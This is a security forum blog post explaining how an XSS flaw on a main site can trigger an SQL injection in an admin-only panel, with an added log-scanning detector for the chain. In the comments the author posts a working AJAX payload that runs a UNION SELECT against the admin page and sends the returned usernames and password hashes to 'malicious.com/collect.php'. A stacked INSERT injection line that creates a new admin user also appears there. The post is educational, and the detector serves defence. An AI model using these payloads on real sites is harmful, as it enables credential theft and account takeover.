• SQL Injection Via XSS

    One of the G4H members, mandi, from Garage4hackers Forums - Home (my second home) asked a few days ago about the XSS-SQLi attack. He had a scenario where the main site has a cross-site scripting vulnerability and the admin panel has an SQL injection. The page with the SQL injection in the admin panel is only accessible to the admin. The question was: is it possible to use the XSS on the main site to exploit the SQL injection in the admin panel and get the admin account pwned?

    Here is my answer, with the following scenario:

    There is a main site which is vulnerable to an XSS flaw (reflected or stored). The same site has an admin panel which is only accessible to admin users, and one of its authenticated pages is vulnerable to SQL injection. The admin panel can be a separate package like cPanel, in which case the SQL injection vulnerability will already be published (exploit-db FTW!!!).

    This is how the admin account can be pwned using SQL injection via XSS:
    1. The attacker crafts an XSS payload which uses AJAX to make a request carrying the SQL injection payload.
    2. He sends the payload to the admin user.
    3. When the admin user is logged in to the admin panel and clicks the payload link from the attacker, the SQL injection in the admin page is exploited and returns the usernames and password hashes from the admin table.
    4. The attacker then submits the returned data to his own site using AJAX and cracks the password hashes offline.
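    From the defender's side, this chain leaves two traces in the admin panel's web-server log: a UNION SELECT payload in the query string, and a request into the admin area whose Referer is a page outside it (the AJAX call fired from the XSS'd main site). The Node.js script below is an added example, not part of the original post; the log lines, the combined-log format and the `/admin/` prefix are constructed assumptions.

```javascript
// Added example (not from the original post): flag admin-panel requests that
// look like the XSS -> SQLi chain described above. Everything below is
// constructed; the paths mirror the post's /admin/index.php?page=vuln&id=... URL.
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Oct/2011:13:55:36 +0000] "GET /admin/index.php?page=vuln&id=1 HTTP/1.1" 200 512 "http://mysite.com/admin/index.php" "Mozilla/5.0"',
  '10.0.0.5 - - [10/Oct/2011:13:55:41 +0000] "GET /admin/index.php?page=vuln&id=1%27+UNION+ALL+SELECT+user,password+from+users--+- HTTP/1.1" 200 2048 "http://mysite.com/search.php?q=test" "Mozilla/5.0"',
  '10.0.0.9 - - [10/Oct/2011:13:56:02 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

// "combined" log format: ip ident user [time] "method path proto" status bytes "referer" "agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;
// Keyword sequence used in the post's payload, plus the trailing MySQL comment terminator
const SQLI_RE = /union\s+(all\s+)?select|--\s*-?\s*$/i;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]), referer: m[6], agent: m[7] };
}

// Decode like the server does ('+' is a space, then percent-decoding); matching the raw path
// would miss "UNION+ALL+SELECT" and "%27".
function decodeQuery(path) {
  try { return decodeURIComponent(path.replace(/\+/g, ' ')); } catch (e) { return path; }
}

function analyzeRequest(line, adminPrefix = '/admin/') {
  const req = parseLine(line);
  if (!req) return null;
  const findings = [];
  if (SQLI_RE.test(decodeQuery(req.path))) findings.push('sqli-pattern');
  if (req.path.startsWith(adminPrefix) && req.referer !== '-') {
    let refPath = '';
    try { refPath = new URL(req.referer).pathname; } catch (e) { /* unparsable referer counts as outside */ }
    if (!refPath.startsWith(adminPrefix)) findings.push('admin-request-from-non-admin-page');
  }
  return { ...req, findings };
}

// Returns only the requests that triggered at least one finding.
function scanLog(lines) {
  return lines.map((l) => analyzeRequest(l)).filter((r) => r && r.findings.length > 0);
}

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(`${hit.time} ${hit.ip} ${hit.path} -> ${hit.findings.join(', ')}`);
}
```

On the constructed log the second line is the only hit, carrying both findings; a benign admin request with an in-panel Referer produces none.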

    Video Demonstration:


    Any suggestions, comments are welcome.

    AMol NAik
    This article was originally published in blog: SQL Injection Via XSS started by amolnaik4
    Comments (5)
    41.w4r10r -
      Hey Amol, how about sharing your AJAX script...
      Also, can we include a few more attack vectors in this script? As we already know, we can use an INSERT query and insert an admin user instead of going through the long process of cracking the hash...
    amolnaik4 -
      hey 41.w4r10r,

      Here is the ajax script used in video:
      Code:
      var url = "http://mysite.com/admin/index.php?page=vuln&id=1'+UNION+ALL+SELECT+user,password+from+users-- -";

      // Same-origin request to the admin page: the browser attaches the admin's session cookie.
      var xmlhttp = new XMLHttpRequest();
      xmlhttp.open("GET", url, true);

      xmlhttp.onreadystatechange = function() {
          if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
              sendtoattacker(xmlhttp.responseText);
          }
      };

      xmlhttp.send();

      function sendtoattacker(data) {
          var myurl = "http://malicious.com/collect.php?log=" + data;
          var xhr = new XMLHttpRequest();
          xhr.open("GET", myurl, true);
          // Completion handler belongs to this second request (xhr), not to xmlhttp.
          xhr.onreadystatechange = function() {
              if (xhr.readyState == 4 && xhr.status == 200) {
                  alert("Pass2");
              }
          };
          xhr.send();
      }
      Yes, we can include all SQLi attacks using this. We just need to change the AJAX script accordingly.

      But with MySQL-PHP, we can't use stacked SQL queries, so it's not possible to use INSERT/UPDATE in this case:
      Code:
      http://mysite.com/admin/index.php?page=vuln&id=1';INSERT INTO users values('10','newadmin','newpass');-- -
      It may be possible on other platforms.

      AMol NAik
    Angel--D3m0n -
      Please share all attachments (collect.php and user_pass.html). I'm waiting..... Thanks
    amolnaik4 -
      Angel--D3m0n,

      'collect.php' is a simple file which gets input and writes it into the 'user-pass.html' file. I'd suggest you create one yourself so that you learn PHP as well.

      Here are the few steps 'collect.php' should do:
      1. Collect input via a GET parameter.
      2. Open a file for writing.
      3. Write the collected content into the previously opened file.
      4. Close the file.

      Do some googling for syntax and examples. php.net is a great source too.

      AMol NAik
    tush2050 -
      Nice tutorial, brother, learned a lot from it